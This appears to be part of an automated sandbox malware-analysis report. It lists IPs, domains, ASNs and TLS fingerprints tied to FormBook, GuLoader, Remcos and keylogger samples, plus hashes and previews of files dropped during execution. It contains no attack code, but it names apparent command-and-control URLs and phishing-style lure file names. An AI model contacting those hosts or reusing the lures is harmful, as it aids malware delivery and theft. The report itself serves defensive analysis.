                                                                                                      16:11:23API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                      16:11:24API Interceptor140x Sleep call for process: powershell.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      13.248.169.48URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.espuna.xyz/mzf9/
                                                                                                      Enquiry for Product Availability and Prices March 2025.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.satoshichecker.xyz/0hyc/
                                                                                                      Revised attached statement of account PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.acguys.xyz/9o3s/
                                                                                                      ulQGCeP6wq.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.royalpets.shop/ya0b/
                                                                                                      LuVDXknQ74.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.bigjoy.xyz/lb93/
                                                                                                      3tEL1ZRXA6.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.zucchini.pro/ypfs/?Lfpd=o6ndcl&Ar6T=a98XbjqptNV7rGDB2x0DDU/ay+t/1JPrvtRBG2jmZVN551KbIgQK/wQlqvBLsXAusN2utofiyCDy42RQb9O2sLM7ulj6VYFxJWipNiA5M1SoGwdICA==
                                                                                                      qG1UyF644w.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • www.woca.group/g6ww/
                                                                                                      uc8ECO2BBU.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.moodplanet.xyz/1f3z/
                                                                                                      GLTsrBfIp1.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.satoshichecker.xyz/0hyc/
                                                                                                      GzvFF0LziH.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.mostbetv1.xyz/6u46/
                                                                                                      84.32.84.32SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • www.natividade.tech/3szq/
                                                                                                      Enquiry for Product Availability and Prices March 2025.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.christmas-goods.store/0bn4/
                                                                                                      LhMU00WNoQ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • www.antiviruslab.cyou/9wcy/
                                                                                                      GLTsrBfIp1.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.christmas-goods.store/0bn4/
                                                                                                      GzvFF0LziH.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.justachillaiguy.xyz/r6bx/
                                                                                                      wiCm57om4k.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.bellysweep.net/5d48/
                                                                                                      ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.christmas-goods.store/uq6t/
                                                                                                      INVOICE 4562.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.christmas-goods.store/t9bf/
                                                                                                      Payment-031025-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.christmas-goods.store/t9bf/
                                                                                                      INVOICE #546 JPT.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.bellysweep.net/5d48/

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      www.matrixfitness.orgSOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 13.248.169.48
                                                                                                      bg.microsoft.map.fastly.netPOETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.210.172
                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.214.172
                                                                                                      Section_PE32_image_Aint13_Aint13_body.efi.dllGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.214.172
                                                                                                      Fd-Employee-Handbook(1).pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.214.172
                                                                                                      PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 199.232.214.172
                                                                                                      ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 199.232.210.172
                                                                                                      Online Notification.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 199.232.210.172
                                                                                                      FW 188355..msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 199.232.214.172
                                                                                                      x3xqeKOaAd.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                      • 199.232.210.172
                                                                                                      PastePictures 1.xlaGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.214.172

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      NTT-LT-ASLTSOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 84.32.84.32
                                                                                                      Enquiry for Product Availability and Prices March 2025.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 84.32.84.32
                                                                                                      LhMU00WNoQ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 84.32.84.32
                                                                                                      GLTsrBfIp1.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 84.32.84.32
                                                                                                      GzvFF0LziH.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 84.32.84.32
                                                                                                      wiCm57om4k.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 84.32.84.32
                                                                                                      ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 84.32.84.32
                                                                                                      INVOICE 4562.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 84.32.84.32
                                                                                                      Payment-031025-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 84.32.84.32
                                                                                                      INVOICE #546 JPT.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 84.32.84.32
                                                                                                      AMAZON-02USSOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 13.248.169.48
                                                                                                      https://simplified.com/designs/7d05440c-37c6-4466-b5ff-6e61f39c0350/share?utm_content=7d05440c-37c6-4466-b5ff-6e61f39c0350&utm_campaign=share&utm_medium=link&utm_source=projectlinksGet hashmaliciousUnknownBrowse
                                                                                                      • 18.245.31.42
                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                      • 34.215.158.160
                                                                                                      http://0neamerica.comGet hashmaliciousUnknownBrowse
                                                                                                      • 18.245.60.43
                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                      • 34.215.158.160
                                                                                                      SmartPDFPro.msiGet hashmaliciousUnknownBrowse
                                                                                                      • 143.204.98.32
                                                                                                      URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 13.248.169.48
                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                      • 34.215.158.160
                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                      • 34.215.158.160
                                                                                                      Fw Invitation for Eligibilitytrackingcalculators to Participate in Asset Growth.msgGet hashmaliciousUnknownBrowse
                                                                                                      • 3.167.227.108

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eSOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      file.exeGet hashmaliciousDarkTortilla, XWormBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      Document BT24#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      q2e132qweertgd.exe.bin.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      lalaloopy.htaGet hashmaliciousUnknownBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      SNKO05B241100201.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      SNKO05B241100201..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      SNKO05B241100201.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 216.58.206.33
                                                                                                      • 142.250.184.206
                                                                                                      37f463bf4616ecd445d4a1937da06e19Payment_Notification.vbsGet hashmaliciousUnknownBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      Document BT24#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      rgk62zzDVd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      pgsAuwtaJ4.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      ESrG8c98zz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      ZS0Uo8zwGk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33
                                                                                                      LhMU00WNoQ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 172.217.23.110
                                                                                                      • 216.58.206.33

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1310720
                                                                                                      Entropy (8bit):1.3073682236789859
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr1:KooCEYhgYEL0In
                                                                                                      MD5:3C77CC57A84701610B2CCE9F84BD5DBA
                                                                                                      SHA1:DF2A7E98596174D37F191D90D430E2DA02C5F494
                                                                                                      SHA-256:959B8301BC5566688EFC5D4374E46956DCAE6481AAB7EBBAA6E2BD78DDE180BF
                                                                                                      SHA-512:DA899F96CCC001C00CCE51453677992B3908319F13F7BA49891158EB217DFFC413E3AD547DF9ED04C05EBDE715C5FE2A54CCFABDEC8124F276E15CAE9376C84A
                                                                                                      Malicious:false
                                                                                                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd897a882, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1310720
                                                                                                      Entropy (8bit):0.42215417791460363
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
                                                                                                      MD5:11C6D52BD391CE1CC45C044DF5522F6F
                                                                                                      SHA1:2F044C09A83F0B1DC66B0F5803909D30FDA10212
                                                                                                      SHA-256:B2E86A960D384C8FB4F859D4ADE666C736ACC8298BEE56E95E1BD51BE8C6025A
                                                                                                      SHA-512:8814560E87B0BDF8079E65AB735918EB5B1B7D6436EC8D4584C068264D15599DEA52F337BF964ADCAC1B5FE8895208FD5A21CCC7624B8045B0C10C9F54DF3013
                                                                                                      Malicious:false
                                                                                                      Preview:...... .......A.......X\...;...{......................0.!..........{A......}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................}=p.....}..................U&.I.....}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16384
                                                                                                      Entropy (8bit):0.07694399369746519
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:NSl8YeF+uhGjjn13a/gds9pmYwllAllcVO/lnlZMxZNQl:NS6zF+uGj53qgMpmYQlAOewk
                                                                                                      MD5:0DADD8B2F0911DBF796756F61977BD77
                                                                                                      SHA1:39B708E02859BC92A8750F8866DC42216A533F90
                                                                                                      SHA-256:8AE5303C8B55C42FEDDA44613093A38CACFA55C38DA6600A498C7BD712E4A728
                                                                                                      SHA-512:FED2447C5FBA88AD023ED6C81121494FFD74FBEDFEE8A10F7276D33258DEE27035E3BF7DF537A6ECAF3DBD84B6FE8A6060CFBAA4ABCFDE5C0C0E54B7418E6FCC
                                                                                                      Malicious:false
                                                                                                      Preview:fevK.....................................;...{.......}.......{A..............{A......{A..........{A]................U&.I.....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                      Category:dropped
                                                                                                      Size (bytes):73305
                                                                                                      Entropy (8bit):7.996028107841645
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                                                                                                      MD5:83142242E97B8953C386F988AA694E4A
                                                                                                      SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                                                                      SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                                                                      SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                                                                      Malicious:false
                                                                                                      Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):330
                                                                                                      Entropy (8bit):3.2871362927554144
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kK5mcQRnSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:hmfZkPlE99SNxAhUeq8S
                                                                                                      MD5:6AE2F71143B8B732A8C052CE154AB1E3
                                                                                                      SHA1:784E3E9A727F4CF8652DB10F3B25D9596B1030C2
                                                                                                      SHA-256:B686CCB57D21ADBC3F53473F726697AB7D8D239E427A565E63781514733EEF1F
                                                                                                      SHA-512:1331172B702007675E9DDD28118FB0B52C1B7A6964D4D801ECF72D68200F82F48E42F6505245967044A3AEBCBF4B35960B4E6BE3C0C3A795870781432E38BDC0
                                                                                                      Malicious:false
                                                                                                      Preview:p...... ..........5.....(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11608
                                                                                                      Entropy (8bit):4.8908305915084105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                                      MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                                      SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                                      SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                                      SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................X..............@..........

                                                                                                      C:\Users\user\AppData\Local\Temp\5c0G518

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):139264
                                                                                                      Entropy (8bit):0.951889861146889
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaWtPqfPk:CfJ6a9xpnQLqtzKWJntPqfM
                                                                                                      MD5:2791D27717CAB5981A0EA5AD07EE6B64
                                                                                                      SHA1:1ACFA3E6B2D3A682CA918D6C1AA4AEBFBA2D9B75
                                                                                                      SHA-256:A2D12FE1A445318E2A559FA65998843F50469BEDB41B0F8EBEF008DB6EEE1A7F
                                                                                                      SHA-512:74FE33DD01CD441635EA88876E743B755C1092EAE29C8CA71E108995550C7994B1911295FC68F8B6688F0AC1CDB9313FC9A6714FB65BEA3F4956865978006E6F
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1na13ziy.0em.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tyvkwgb.ih3.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guz03upx.ao0.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogdukn3m.5fs.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Roaming\Beflingens.Com

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524376
                                                                                                      Entropy (8bit):5.8737656712328
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:oezQmwsH8zQvQ6U86h3rlExopu+gSYxLsPSwGGYH1yiQ:oezZH8zQvG3xgog/xs6VVVy3
                                                                                                      MD5:ADD0A593BB9AD33E53FF8D46A670959F
                                                                                                      SHA1:33FA96AC965CBF273DF7C0619BE994D26697AC3C
                                                                                                      SHA-256:979A76E3E34D70EC710DC1C98383FB4D7A4955CAEB92FB52CF6F655F0B49BBC8
                                                                                                      SHA-512:F78F2DB5AFA9F85019C5736CA377AFA0D6EBB1F8C1B362AB7655FA1B443610D052F440A817C076BD68AA1579C97C72A702EF2BA3B70CD7C4A4661B6E79FE4A90
                                                                                                      Malicious:false
